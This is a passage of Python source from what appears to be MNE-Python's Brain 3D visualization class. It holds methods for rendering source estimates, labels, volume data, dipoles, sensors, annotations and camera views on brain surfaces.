%(verbose)s Notes ----- If the data is defined for a subset of vertices (specified by the "vertices" parameter), a smoothing method is used to interpolate the data onto the high resolution surface. If the data is defined for subsampled version of the surface, smoothing_steps can be set to None, in which case only as many smoothing steps are applied until the whole surface is filled with non-zeros. Due to a VTK alpha rendering bug, ``vector_alpha`` is clamped to be strictly < 1. """ _validate_type(transparent, bool, 'transparent') _validate_type(vector_alpha, ('numeric', None), 'vector_alpha') _validate_type(scale_factor, ('numeric', None), 'scale_factor') # those parameters are not supported yet, only None is allowed _check_option('thresh', thresh, [None]) _check_option('remove_existing', remove_existing, [None]) _validate_type(time_label_size, (None, 'numeric'), 'time_label_size') if time_label_size is not None: time_label_size = float(time_label_size) if time_label_size < 0: raise ValueError('time_label_size must be positive, got ' f'{time_label_size}') hemi = self._check_hemi(hemi, extras=['vol']) stc, array, vertices = self._check_stc(hemi, array, vertices) array = np.asarray(array) vector_alpha = alpha if vector_alpha is None else vector_alpha self._data['vector_alpha'] = vector_alpha self._data['scale_factor'] = scale_factor # Create time array and add label if > 1D if array.ndim <= 1: time_idx = 0 else: # check time array if time is None: time = np.arange(array.shape[-1]) else: time = np.asarray(time) if time.shape != (array.shape[-1],): raise ValueError('time has shape %s, but need shape %s ' '(array.shape[-1])' % (time.shape, (array.shape[-1],))) self._data["time"] = time if self._n_times is None: self._times = time elif len(time) != self._n_times: raise ValueError("New n_times is different from previous " "n_times") elif not np.array_equal(time, self._times): raise ValueError("Not all time values are consistent with " "previously set times.") # initial time if initial_time is None: time_idx = 0 else: time_idx = self._to_time_index(initial_time) # time label time_label, _ = _handle_time(time_label, 's', time) y_txt = 0.05 + 0.1 * bool(colorbar) if array.ndim == 3: if array.shape[1] != 3: raise ValueError('If array has 3 dimensions, array.shape[1] ' 'must equal 3, got %s' % (array.shape[1],)) fmin, fmid, fmax = _update_limits( fmin, fmid, fmax, center, array ) if colormap == 'auto': colormap = 'mne' if center is not None else 'hot' if smoothing_steps is None: smoothing_steps = 7 elif smoothing_steps == 'nearest': smoothing_steps = -1 elif isinstance(smoothing_steps, int): if smoothing_steps < 0: raise ValueError('Expected value of `smoothing_steps` is' ' positive but {} was given.'.format( smoothing_steps)) else: raise TypeError('Expected type of `smoothing_steps` is int or' ' NoneType but {} was given.'.format( type(smoothing_steps))) self._data['stc'] = stc self._data['src'] = src self._data['smoothing_steps'] = smoothing_steps self._data['clim'] = clim self._data['time'] = time self._data['initial_time'] = initial_time self._data['time_label'] = time_label self._data['initial_time_idx'] = time_idx self._data['time_idx'] = time_idx self._data['transparent'] = transparent # data specific for a hemi self._data[hemi] = dict() self._data[hemi]['glyph_dataset'] = None self._data[hemi]['glyph_mapper'] = None self._data[hemi]['glyph_actor'] = None self._data[hemi]['array'] = array self._data[hemi]['vertices'] = vertices self._data['alpha'] = alpha self._data['colormap'] = colormap 
self._data['center'] = center self._data['fmin'] = fmin self._data['fmid'] = fmid self._data['fmax'] = fmax self.update_lut() # 1) add the surfaces first actor = None for _ in self._iter_views(hemi): if hemi in ('lh', 'rh'): actor = self._layered_meshes[hemi]._actor else: src_vol = src[2:] if src.kind == 'mixed' else src actor, _ = self._add_volume_data(hemi, src_vol, volume_options) assert actor is not None # should have added one self._add_actor('data', actor) # 2) update time and smoothing properties # set_data_smoothing calls "set_time_point" for us, which will set # _current_time self.set_time_interpolation(self.time_interpolation) self.set_data_smoothing(self._data['smoothing_steps']) # 3) add the other actors if colorbar is True: # bottom left by default colorbar = (self._subplot_shape[0] - 1, 0) for ri, ci, v in self._iter_views(hemi): # Add the time label to the bottommost view do = (ri, ci) == colorbar if not self._time_label_added and time_label is not None and do: time_actor = self._renderer.text2d( x_window=0.95, y_window=y_txt, color=self._fg_color, size=time_label_size, text=time_label(self._current_time), justification='right' ) self._data['time_actor'] = time_actor self._time_label_added = True if colorbar and self._scalar_bar is None and do: kwargs = dict(source=actor, n_labels=8, color=self._fg_color, bgcolor=self._brain_color[:3]) kwargs.update(colorbar_kwargs or {}) self._scalar_bar = self._renderer.scalarbar(**kwargs) self._renderer.set_camera( update=False, reset_camera=False, **views_dicts[hemi][v]) # 4) update the scalar bar and opacity self.update_lut(alpha=alpha) def remove_data(self): """Remove rendered data from the mesh.""" self._remove('data', render=True) def _iter_views(self, hemi): """Iterate over rows and columns that need to be added to.""" hemi_dict = dict(lh=[0], rh=[0], vol=[0]) if self._hemi == 'split': hemi_dict.update(rh=[1], vol=[0, 1]) for vi, view in enumerate(self._views): view_dict = dict(lh=[vi], rh=[vi], vol=[vi]) if self._hemi == 'split': view_dict.update(vol=[vi, vi]) if self._view_layout == 'vertical': rows, cols = view_dict, hemi_dict # views are rows, hemis cols else: rows, cols = hemi_dict, view_dict # hemis are rows, views cols for ri, ci in zip(rows[hemi], cols[hemi]): self._renderer.subplot(ri, ci) yield ri, ci, view def remove_labels(self): """Remove all the ROI labels from the image.""" for hemi in self._hemis: mesh = self._layered_meshes[hemi] for label in self._labels[hemi]: mesh.remove_overlay(label.name) self._labels[hemi].clear() self._renderer._update() def remove_annotations(self): """Remove all annotations from the image.""" for hemi in self._hemis: mesh = self._layered_meshes[hemi] mesh.remove_overlay(self._annots[hemi]) self._annots[hemi].clear() self._renderer._update() def _add_volume_data(self, hemi, src, volume_options): from ..backends._pyvista import _hide_testing_actor _validate_type(src, SourceSpaces, 'src') _check_option('src.kind', src.kind, ('volume',)) _validate_type( volume_options, (dict, 'numeric', None), 'volume_options') assert hemi == 'vol' if not isinstance(volume_options, dict): volume_options = dict( resolution=float(volume_options) if volume_options is not None else None) volume_options = _handle_default('volume_options', volume_options) allowed_types = ( ['resolution', (None, 'numeric')], ['blending', (str,)], ['alpha', ('numeric', None)], ['surface_alpha', (None, 'numeric')], ['silhouette_alpha', (None, 'numeric')], ['silhouette_linewidth', ('numeric',)], ) for key, types in allowed_types: 
_validate_type(volume_options[key], types, f'volume_options[{repr(key)}]') extra_keys = set(volume_options) - set(a[0] for a in allowed_types) if len(extra_keys): raise ValueError( f'volume_options got unknown keys {sorted(extra_keys)}') blending = _check_option('volume_options["blending"]', volume_options['blending'], ('composite', 'mip')) alpha = volume_options['alpha'] if alpha is None: alpha = 0.4 if self._data[hemi]['array'].ndim == 3 else 1. alpha = np.clip(float(alpha), 0., 1.) resolution = volume_options['resolution'] surface_alpha = volume_options['surface_alpha'] if surface_alpha is None: surface_alpha = min(alpha / 2., 0.1) silhouette_alpha = volume_options['silhouette_alpha'] if silhouette_alpha is None: silhouette_alpha = surface_alpha / 4. silhouette_linewidth = volume_options['silhouette_linewidth'] del volume_options volume_pos = self._data[hemi].get('grid_volume_pos') volume_neg = self._data[hemi].get('grid_volume_neg') center = self._data['center'] if volume_pos is None: xyz = np.meshgrid( *[np.arange(s) for s in src[0]['shape']], indexing='ij') dimensions = np.array(src[0]['shape'], int) mult = 1000 if self._units == 'mm' else 1 src_mri_t = src[0]['src_mri_t']['trans'].copy() src_mri_t[:3] *= mult if resolution is not None: resolution = resolution * mult / 1000. # to mm del src, mult coords = np.array([c.ravel(order='F') for c in xyz]).T coords = apply_trans(src_mri_t, coords) self.geo[hemi] = Bunch(coords=coords) vertices = self._data[hemi]['vertices'] assert self._data[hemi]['array'].shape[0] == len(vertices) # MNE constructs the source space on a uniform grid in MRI space, # but mne coreg can change it to be non-uniform, so we need to # use all three elements here assert np.allclose( src_mri_t[:3, :3], np.diag(np.diag(src_mri_t)[:3])) spacing = np.diag(src_mri_t)[:3] origin = src_mri_t[:3, 3] - spacing / 2. scalars = np.zeros(np.prod(dimensions)) scalars[vertices] = 1. # for the outer mesh grid, grid_mesh, volume_pos, volume_neg = \ self._renderer._volume(dimensions, origin, spacing, scalars, surface_alpha, resolution, blending, center) self._data[hemi]['alpha'] = alpha # incorrectly set earlier self._data[hemi]['grid'] = grid self._data[hemi]['grid_mesh'] = grid_mesh self._data[hemi]['grid_coords'] = coords self._data[hemi]['grid_src_mri_t'] = src_mri_t self._data[hemi]['grid_shape'] = dimensions self._data[hemi]['grid_volume_pos'] = volume_pos self._data[hemi]['grid_volume_neg'] = volume_neg actor_pos, _ = self._renderer.plotter.add_actor( volume_pos, reset_camera=False, name=None, culling=False, render=False) actor_neg = actor_mesh = None if volume_neg is not None: actor_neg, _ = self._renderer.plotter.add_actor( volume_neg, reset_camera=False, name=None, culling=False, render=False) grid_mesh = self._data[hemi]['grid_mesh'] if grid_mesh is not None: actor_mesh, prop = self._renderer.plotter.add_actor( grid_mesh, reset_camera=False, name=None, culling=False, pickable=False, render=False) prop.SetColor(*self._brain_color[:3]) prop.SetOpacity(surface_alpha) if silhouette_alpha > 0 and silhouette_linewidth > 0: for _ in self._iter_views('vol'): self._renderer._silhouette( mesh=grid_mesh.GetInput(), color=self._brain_color[:3], line_width=silhouette_linewidth, alpha=silhouette_alpha, ) for actor in (actor_pos, actor_neg, actor_mesh): if actor is not None: _hide_testing_actor(actor) return actor_pos, actor_neg def add_label(self, label, color=None, alpha=1, scalar_thresh=None, borders=False, hemi=None, subdir=None, reset_camera=True): """Add an ROI label to the image. 
Parameters ---------- label : str | instance of Label Label filepath or name. Can also be an instance of an object with attributes "hemi", "vertices", "name", and optionally "color" and "values" (if scalar_thresh is not None). color : matplotlib-style color | None Anything matplotlib accepts: string, RGB, hex, etc. (default "crimson"). alpha : float in [0, 1] Alpha level to control opacity. scalar_thresh : None | float Threshold the label ids using this value in the label file's scalar field (i.e. label only vertices with scalar >= thresh). borders : bool | int Show only label borders. If int, specify the number of steps (away from the true border) along the cortical mesh to include as part of the border definition. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. subdir : None | str If a label is specified as name, subdir can be used to indicate that the label file is in a sub-directory of the subject's label directory rather than in the label directory itself (e.g. for ``$SUBJECTS_DIR/$SUBJECT/label/aparc/lh.cuneus.label`` ``brain.add_label('cuneus', subdir='aparc')``). reset_camera : bool If True, reset the camera view after adding the label. Defaults to True. Notes ----- To remove previously added labels, run Brain.remove_labels(). """ from ...label import read_label if isinstance(label, str): if color is None: color = "crimson" if os.path.isfile(label): filepath = label label = read_label(filepath) hemi = label.hemi label_name = os.path.basename(filepath).split('.')[1] else: hemi = self._check_hemi(hemi) label_name = label label_fname = ".".join([hemi, label_name, 'label']) if subdir is None: filepath = op.join(self._subjects_dir, self._subject_id, 'label', label_fname) else: filepath = op.join(self._subjects_dir, self._subject_id, 'label', subdir, label_fname) if not os.path.exists(filepath): raise ValueError('Label file %s does not exist' % filepath) label = read_label(filepath) ids = label.vertices scalars = label.values else: # try to extract parameters from label instance try: hemi = label.hemi ids = label.vertices if label.name is None: label.name = 'unnamed' + str(self._unnamed_label_id) self._unnamed_label_id += 1 label_name = str(label.name) if color is None: if hasattr(label, 'color') and label.color is not None: color = label.color else: color = "crimson" if scalar_thresh is not None: scalars = label.values except Exception: raise ValueError('Label was not a filename (str), and could ' 'not be understood as a class. 
The class ' 'must have attributes "hemi", "vertices", ' '"name", and (if scalar_thresh is not None)' '"values"') hemi = self._check_hemi(hemi) if scalar_thresh is not None: ids = ids[scalars >= scalar_thresh] if self.time_viewer and self.show_traces \ and self.traces_mode == 'label': stc = self._data["stc"] src = self._data["src"] tc = stc.extract_label_time_course(label, src=src, mode=self.label_extract_mode) tc = tc[0] if tc.ndim == 2 else tc[0, 0, :] color = next(self.color_cycle) line = self.mpl_canvas.plot( self._data['time'], tc, label=label_name, color=color) else: line = None orig_color = color color = _to_rgb(color, alpha, alpha=True) cmap = np.array([(0, 0, 0, 0,), color]) ctable = np.round(cmap * 255).astype(np.uint8) scalars = np.zeros(self.geo[hemi].coords.shape[0]) scalars[ids] = 1 if borders: keep_idx = _mesh_borders(self.geo[hemi].faces, scalars) show = np.zeros(scalars.size, dtype=np.int64) if isinstance(borders, int): for _ in range(borders): keep_idx = np.in1d( self.geo[hemi].faces.ravel(), keep_idx) keep_idx.shape = self.geo[hemi].faces.shape keep_idx = self.geo[hemi].faces[np.any( keep_idx, axis=1)] keep_idx = np.unique(keep_idx) show[keep_idx] = 1 scalars *= show for _, _, v in self._iter_views(hemi): mesh = self._layered_meshes[hemi] mesh.add_overlay( scalars=scalars, colormap=ctable, rng=[np.min(scalars), np.max(scalars)], opacity=alpha, name=label_name, ) if reset_camera: self._renderer.set_camera(update=False, **views_dicts[hemi][v]) if self.time_viewer and self.show_traces \ and self.traces_mode == 'label': label._color = orig_color label._line = line self._labels[hemi].append(label) self._renderer._update() @fill_doc def add_forward(self, fwd, trans, alpha=1, scale=None): """Add a quiver to render positions of dipoles. Parameters ---------- %(fwd)s %(trans_not_none)s %(alpha)s Default 1. scale : None | float The size of the arrow representing the dipoles in :class:`mne.viz.Brain` units. Default 1.5mm. Notes ----- .. versionadded:: 1.0 """ head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans if scale is None: scale = 1.5 if self._units == 'mm' else 1.5e-3 error_msg = ('Unexpected forward model coordinate frame ' '{}, must be "head" or "mri"') if fwd['coord_frame'] in _frame_to_str: fwd_frame = _frame_to_str[fwd['coord_frame']] if fwd_frame == 'mri': fwd_trans = Transform('mri', 'mri') elif fwd_frame == 'head': fwd_trans = head_mri_t else: raise RuntimeError(error_msg.format(fwd_frame)) else: raise RuntimeError(error_msg.format(fwd['coord_frame'])) for actor in _plot_forward( self._renderer, fwd, fwd_trans, fwd_scale=1e3 if self._units == 'mm' else 1, scale=scale, alpha=alpha): self._add_actor('forward', actor) self._renderer._update() def remove_forward(self): """Remove forward sources from the rendered scene.""" self._remove('forward', render=True) @fill_doc def add_dipole(self, dipole, trans, colors='red', alpha=1, scales=None): """Add a quiver to render positions of dipoles. Parameters ---------- dipole : instance of Dipole Dipole object containing position, orientation and amplitude of one or more dipoles or in the forward solution. %(trans_not_none)s colors : list | matplotlib-style color | None A single color or list of anything matplotlib accepts: string, RGB, hex, etc. Default red. %(alpha)s Default 1. scales : list | float | None The size of the arrow representing the dipole in :class:`mne.viz.Brain` units. Default 5mm. Notes ----- .. 
versionadded:: 1.0 """ head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans n_dipoles = len(dipole) if not isinstance(colors, (list, tuple)): colors = [colors] * n_dipoles # make into list if len(colors) != n_dipoles: raise ValueError(f'The number of colors ({len(colors)}) ' f'and dipoles ({n_dipoles}) must match') colors = [_to_rgb(color, name=f'colors[{ci}]') for ci, color in enumerate(colors)] if scales is None: scales = 5 if self._units == 'mm' else 5e-3 if not isinstance(scales, (list, tuple)): scales = [scales] * n_dipoles # make into list if len(scales) != n_dipoles: raise ValueError(f'The number of scales ({len(scales)}) ' f'and dipoles ({n_dipoles}) must match') pos = apply_trans(head_mri_t, dipole.pos) pos *= 1e3 if self._units == 'mm' else 1 for _ in self._iter_views('vol'): for this_pos, this_ori, color, scale in zip( pos, dipole.ori, colors, scales): actor, _ = self._renderer.quiver3d( *this_pos, *this_ori, color=color, opacity=alpha, mode='arrow', scale=scale, scale_mode='scalar', scalars=[1]) self._add_actor('dipole', actor) self._renderer._update() def remove_dipole(self): """Remove dipole objects from the rendered scene.""" self._remove('dipole', render=True) @fill_doc def add_head(self, dense=True, color='gray', alpha=0.5): """Add a mesh to render the outer head surface. Parameters ---------- dense : bool Whether to plot the dense head (``seghead``) or the less dense head (``head``). %(color_matplotlib)s %(alpha)s Notes ----- .. versionadded:: 0.24 """ # load head surf = _get_head_surface('seghead' if dense else 'head', self._subject_id, self._subjects_dir) verts, triangles = surf['rr'], surf['tris'] verts *= 1e3 if self._units == 'mm' else 1 color = _to_rgb(color) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('head', actor) self._renderer._update() def remove_head(self): """Remove head objects from the rendered scene.""" self._remove('head', render=True) @fill_doc def add_skull(self, outer=True, color='gray', alpha=0.5): """Add a mesh to render the skull surface. Parameters ---------- outer : bool Adds the outer skull if ``True``, otherwise adds the inner skull. %(color_matplotlib)s %(alpha)s Notes ----- .. versionadded:: 0.24 """ surf = _get_skull_surface('outer' if outer else 'inner', self._subject_id, self._subjects_dir) verts, triangles = surf['rr'], surf['tris'] verts *= 1e3 if self._units == 'mm' else 1 color = _to_rgb(color) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('skull', actor) self._renderer._update() def remove_skull(self): """Remove skull objects from the rendered scene.""" self._remove('skull', render=True) @fill_doc def add_volume_labels(self, aseg='aparc+aseg', labels=None, colors=None, alpha=0.5, smooth=0.9, fill_hole_size=None, legend=None): """Add labels to the rendering from an anatomical segmentation. Parameters ---------- %(aseg)s labels : list Labeled regions of interest to plot. See :func:`mne.get_montage_volume_labels` for one way to determine regions of interest. Regions can also be chosen from the :term:`FreeSurfer LUT`. colors : list | matplotlib-style color | None A list of anything matplotlib accepts: string, RGB, hex, etc. (default :term:`FreeSurfer LUT` colors). 
%(alpha)s %(smooth)s fill_hole_size : int | None The size of holes to remove in the mesh in voxels. Default is None, no holes are removed. Warning, this dilates the boundaries of the surface by ``fill_hole_size`` number of voxels so use the minimal size. legend : bool | None | dict Add a legend displaying the names of the ``labels``. Default (None) is ``True`` if the number of ``labels`` is 10 or fewer. Can also be a dict of ``kwargs`` to pass to :meth:`pyvista.Plotter.add_legend`. Notes ----- .. versionadded:: 0.24 """ import nibabel as nib # load anatomical segmentation image if not aseg.endswith('aseg'): raise RuntimeError( f'`aseg` file path must end with "aseg", got {aseg}') aseg = _check_fname(op.join(self._subjects_dir, self._subject_id, 'mri', aseg + '.mgz'), overwrite='read', must_exist=True) aseg_fname = aseg aseg = nib.load(aseg_fname) aseg_data = np.asarray(aseg.dataobj) vox_mri_t = aseg.header.get_vox2ras_tkr() mult = 1e-3 if self._units == 'm' else 1 vox_mri_t[:3] *= mult del aseg # read freesurfer lookup table lut, fs_colors = read_freesurfer_lut() if labels is None: # assign default ROI labels based on indices lut_r = {v: k for k, v in lut.items()} labels = [lut_r[idx] for idx in DEFAULTS['volume_label_indices']] _validate_type(fill_hole_size, (int, None), 'fill_hole_size') _validate_type(legend, (bool, None), 'legend') if legend is None: legend = len(labels) < 11 if colors is None: colors = [fs_colors[label] / 255 for label in labels] elif not isinstance(colors, (list, tuple)): colors = [colors] * len(labels) # make into list colors = [_to_rgb(color, name=f'colors[{ci}]') for ci, color in enumerate(colors)] surfs = _marching_cubes( aseg_data, [lut[label] for label in labels], smooth=smooth, fill_hole_size=fill_hole_size) for label, color, (verts, triangles) in zip(labels, colors, surfs): if len(verts) == 0: # not in aseg vals warn(f'Value {lut[label]} not found for label ' f'{repr(label)} in: {aseg_fname}') continue verts = apply_trans(vox_mri_t, verts) for _ in self._iter_views('vol'): actor, _ = self._renderer.mesh( *verts.T, triangles=triangles, color=color, opacity=alpha, reset_camera=False, render=False) self._add_actor('volume_labels', actor) if legend or isinstance(legend, dict): # use empty kwargs for legend = True legend = legend if isinstance(legend, dict) else dict() self._renderer.plotter.add_legend( list(zip(labels, colors)), **legend) self._renderer._update() def remove_volume_labels(self): """Remove the volume labels from the rendered scene.""" self._remove('volume_labels', render=True) self._renderer.plotter.remove_legend() @fill_doc def add_foci(self, coords, coords_as_verts=False, map_surface=None, scale_factor=1, color="white", alpha=1, name=None, hemi=None, resolution=50): """Add spherical foci, possibly mapping to displayed surf. The foci spheres can be displayed at the coordinates given, or mapped through a surface geometry. In other words, coordinates from a volume-based analysis in MNI space can be displayed on an inflated average surface by finding the closest vertex on the white surface and mapping to that vertex on the inflated mesh. Parameters ---------- coords : ndarray, shape (n_coords, 3) Coordinates in stereotaxic space (default) or array of vertex ids (with ``coord_as_verts=True``). coords_as_verts : bool Whether the coords parameter should be interpreted as vertex ids. map_surface : str | None Surface to project the coordinates to, or None to use raw coords. When set to a surface, each foci is positioned at the closest vertex in the mesh. 
scale_factor : float Controls the size of the foci spheres (relative to 1cm). %(color_matplotlib)s %(alpha)s Default is 1. name : str Internal name to use. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. If two hemispheres are being shown, an error will be thrown. resolution : int The resolution of the spheres. """ hemi = self._check_hemi(hemi, extras=['vol']) # Figure out how to interpret the first parameter if coords_as_verts: coords = self.geo[hemi].coords[coords] map_surface = None # Possibly map the foci coords through a surface if map_surface is not None: from scipy.spatial.distance import cdist foci_surf = _Surface(self._subject_id, hemi, map_surface, self._subjects_dir, offset=0, units=self._units, x_dir=self._rigid[0, :3]) foci_surf.load_geometry() foci_vtxs = np.argmin(cdist(foci_surf.coords, coords), axis=0) coords = self.geo[hemi].coords[foci_vtxs] # Convert the color code color = _to_rgb(color) if self._units == 'm': scale_factor = scale_factor / 1000. for _, _, v in self._iter_views(hemi): self._renderer.sphere(center=coords, color=color, scale=(10. * scale_factor), opacity=alpha, resolution=resolution) self._renderer.set_camera(**views_dicts[hemi][v]) # Store the foci in the Brain._data dictionary data_foci = coords if 'foci' in self._data.get(hemi, []): data_foci = np.vstack((self._data[hemi]['foci'], data_foci)) self._data[hemi] = self._data.get(hemi, dict()) # no data added yet self._data[hemi]['foci'] = data_foci @verbose def add_sensors(self, info, trans, meg=None, eeg='original', fnirs=True, ecog=True, seeg=True, dbs=True, verbose=None): """Add mesh objects to represent sensor positions. Parameters ---------- %(info_not_none)s %(trans_not_none)s %(meg)s %(eeg)s %(fnirs)s %(ecog)s %(seeg)s %(dbs)s %(verbose)s Notes ----- .. versionadded:: 0.24 """ _validate_type(info, Info, 'info') meg, eeg, fnirs, warn_meg = _handle_sensor_types(meg, eeg, fnirs) picks = pick_types(info, meg=('sensors' in meg), ref_meg=('ref' in meg), eeg=(len(eeg) > 0), ecog=ecog, seeg=seeg, dbs=dbs, fnirs=(len(fnirs) > 0)) head_mri_t = _get_trans(trans, 'head', 'mri', allow_none=False)[0] del trans # get transforms to "mri"window to_cf_t = _get_transforms_to_coord_frame( info, head_mri_t, coord_frame='mri') if pick_types(info, eeg=True, exclude=()).size > 0 and \ 'projected' in eeg: head_surf = _get_head_surface( 'seghead', self._subject_id, self._subjects_dir) else: head_surf = None # Do the main plotting for _ in self._iter_views('vol'): if picks.size > 0: sensors_actors = _plot_sensors( self._renderer, info, to_cf_t, picks, meg, eeg, fnirs, warn_meg, head_surf, self._units) for item, actors in sensors_actors.items(): for actor in actors: self._add_actor(item, actor) if 'helmet' in meg and pick_types(info, meg=True).size > 0: surf = get_meg_helmet_surf(info, head_mri_t) verts = surf['rr'] * (1 if self._units == 'm' else 1e3) actor, _ = self._renderer.mesh( *verts.T, surf['tris'], color=DEFAULTS['coreg']['helmet_color'], opacity=0.25, reset_camera=False, render=False) self._add_actor('helmet', actor) self._renderer._update() def remove_sensors(self, kind=None): """Remove sensors from the rendered scene. Parameters ---------- kind : str | list | None If None, removes all sensor-related data including the helmet. Can be "meg", "eeg", "fnirs", "ecog", "seeg", "dbs" or "helmet" to remove that item. 
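
        Examples
        --------
        A minimal sketch, assuming ``brain`` is an existing ``Brain`` instance
        on which :meth:`add_sensors` has already been called::

            brain.remove_sensors()                # drop all sensor items
            brain.remove_sensors(kind='helmet')   # or only the helmet mesh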
""" all_kinds = ('meg', 'eeg', 'fnirs', 'ecog', 'seeg', 'dbs', 'helmet') if kind is None: for item in all_kinds: self._remove(item, render=False) else: if isinstance(kind, str): kind = [kind] for this_kind in kind: _check_option('kind', this_kind, all_kinds) self._remove(this_kind, render=False) self._renderer._update() def add_text(self, x, y, text, name=None, color=None, opacity=1.0, row=0, col=0, font_size=None, justification=None): """Add a text to the visualization. Parameters ---------- x : float X coordinate. y : float Y coordinate. text : str Text to add. name : str Name of the text (text label can be updated using update_text()). color : tuple Color of the text. Default is the foreground color set during initialization (default is black or white depending on the background color). opacity : float Opacity of the text (default 1.0). row : int | None Row index of which brain to use. Default is the top row. col : int | None Column index of which brain to use. Default is the left-most column. font_size : float | None The font size to use. justification : str | None The text justification. """ _validate_type(name, (str, None), 'name') name = text if name is None else name if 'text' in self._actors and name in self._actors['text']: raise ValueError(f'Text with the name {name} already exists') for ri, ci, _ in self._iter_views('vol'): if (row is None or row == ri) and (col is None or col == ci): actor = self._renderer.text2d( x_window=x, y_window=y, text=text, color=color, size=font_size, justification=justification) if 'text' not in self._actors: self._actors['text'] = dict() self._actors['text'][name] = actor def remove_text(self, name=None): """Remove text from the rendered scene. Parameters ---------- name : str | None Remove specific text by name. If None, all text will be removed. """ _validate_type(name, (str, None), 'name') if name is None: for actor in self._actors['text'].values(): self._renderer.plotter.remove_actor(actor) self._actors.pop('text') else: names = [None] if 'text' in self._actors: names += list(self._actors['text'].keys()) _check_option('name', name, names) self._renderer.plotter.remove_actor( self._actors['text'][name]) self._actors['text'].pop(name) self._renderer._update() def _configure_label_time_course(self): from ...label import read_labels_from_annot if not self.show_traces: return if self.mpl_canvas is None: self._configure_mplcanvas() else: self.clear_glyphs() self.traces_mode = 'label' self.add_annotation(self.annot, color="w", alpha=0.75) # now plot the time line self.plot_time_line(update=False) self.mpl_canvas.update_plot() for hemi in self._hemis: labels = read_labels_from_annot( subject=self._subject_id, parc=self.annot, hemi=hemi, subjects_dir=self._subjects_dir ) self._vertex_to_label_id[hemi] = np.full( self.geo[hemi].coords.shape[0], -1) self._annotation_labels[hemi] = labels for idx, label in enumerate(labels): self._vertex_to_label_id[hemi][label.vertices] = idx @fill_doc def add_annotation(self, annot, borders=True, alpha=1, hemi=None, remove_existing=True, color=None): """Add an annotation file. Parameters ---------- annot : str | tuple Either path to annotation file or annotation name. Alternatively, the annotation can be specified as a ``(labels, ctab)`` tuple per hemisphere, i.e. ``annot=(labels, ctab)`` for a single hemisphere or ``annot=((lh_labels, lh_ctab), (rh_labels, rh_ctab))`` for both hemispheres. ``labels`` and ``ctab`` should be arrays as returned by :func:`nibabel.freesurfer.io.read_annot`. 
borders : bool | int Show only label borders. If int, specify the number of steps (away from the true border) along the cortical mesh to include as part of the border definition. %(alpha)s Default is 1. hemi : str | None If None, it is assumed to belong to the hemipshere being shown. If two hemispheres are being shown, data must exist for both hemispheres. remove_existing : bool If True (default), remove old annotations. color : matplotlib-style color code If used, show all annotations in the same (specified) color. Probably useful only when showing annotation borders. """ from ...label import _read_annot hemis = self._check_hemis(hemi) # Figure out where the data is coming from if isinstance(annot, str): if os.path.isfile(annot): filepath = annot path = os.path.split(filepath)[0] file_hemi, annot = os.path.basename(filepath).split('.')[:2] if len(hemis) > 1: if annot[:2] == 'lh.': filepaths = [filepath, op.join(path, 'rh' + annot[2:])] elif annot[:2] == 'rh.': filepaths = [op.join(path, 'lh' + annot[2:], filepath)] else: raise RuntimeError('To add both hemispheres ' 'simultaneously, filename must ' 'begin with "lh." or "rh."') else: filepaths = [filepath] else: filepaths = [] for hemi in hemis: filepath = op.join(self._subjects_dir, self._subject_id, 'label', ".".join([hemi, annot, 'annot'])) if not os.path.exists(filepath): raise ValueError('Annotation file %s does not exist' % filepath) filepaths += [filepath] annots = [] for hemi, filepath in zip(hemis, filepaths): # Read in the data labels, cmap, _ = _read_annot(filepath) annots.append((labels, cmap)) else: annots = [annot] if len(hemis) == 1 else annot annot = 'annotation' for hemi, (labels, cmap) in zip(hemis, annots): # Maybe zero-out the non-border vertices self._to_borders(labels, hemi, borders) # Handle null labels properly cmap[:, 3] = 255 bgcolor = np.round(np.array(self._brain_color) * 255).astype(int) bgcolor[-1] = 0 cmap[cmap[:, 4] < 0, 4] += 2 ** 24 # wrap to positive cmap[cmap[:, 4] <= 0, :4] = bgcolor if np.any(labels == 0) and not np.any(cmap[:, -1] <= 0): cmap = np.vstack((cmap, np.concatenate([bgcolor, [0]]))) # Set label ids sensibly order = np.argsort(cmap[:, -1]) cmap = cmap[order] ids = np.searchsorted(cmap[:, -1], labels) cmap = cmap[:, :4] # Set the alpha level alpha_vec = cmap[:, 3] alpha_vec[alpha_vec > 0] = alpha * 255 # Override the cmap when a single color is used if color is not None: rgb = np.round(np.multiply(_to_rgb(color), 255)) cmap[:, :3] = rgb.astype(cmap.dtype) ctable = cmap.astype(np.float64) for _ in self._iter_views(hemi): mesh = self._layered_meshes[hemi] mesh.add_overlay( scalars=ids, colormap=ctable, rng=[np.min(ids), np.max(ids)], opacity=alpha, name=annot, ) self._annots[hemi].append(annot) if not self.time_viewer or self.traces_mode == 'vertex': self._renderer._set_colormap_range( mesh._actor, cmap.astype(np.uint8), None) self._renderer._update() def close(self): """Close all figures and cleanup data structure.""" self._closed = True self._renderer.close() def show(self): """Display the window.""" from ..backends._utils import _qt_app_exec self._renderer.show() if self._block: _qt_app_exec(self._renderer.figure.store["app"]) @fill_doc def show_view(self, view=None, roll=None, distance=None, *, row=None, col=None, hemi=None, align=True, azimuth=None, elevation=None, focalpoint=None): """Orient camera to display view. Parameters ---------- %(view)s %(roll)s %(distance)s row : int | None The row to set. Default all rows. col : int | None The column to set. Default all columns. 
hemi : str | None Which hemi to use for view lookup (when in "both" mode). align : bool If True, consider view arguments relative to canonical MRI directions (closest to MNI for the subject) rather than native MRI space. This helps when MRIs are not in standard orientation (e.g., have large rotations). %(azimuth)s %(elevation)s %(focalpoint)s Notes ----- The builtin string views are the following perspectives, based on the :term:`RAS` convention. If not otherwise noted, the view will have the top of the brain (superior, +Z) in 3D space shown upward in the 2D perspective: ``'lateral'`` From the left or right side such that the lateral (outside) surface of the given hemisphere is visible. ``'medial'`` From the left or right side such that the medial (inside) surface of the given hemisphere is visible (at least when in split or single-hemi mode). ``'rostral'`` From the front. ``'caudal'`` From the rear. ``'dorsal'`` From above, with the front of the brain pointing up. ``'ventral'`` From below, with the front of the brain pointing up. ``'frontal'`` From the front and slightly lateral, with the brain slightly tilted forward (yielding a view from slightly above). ``'parietal'`` From the rear and slightly lateral, with the brain slightly tilted backward (yielding a view from slightly above). ``'axial'`` 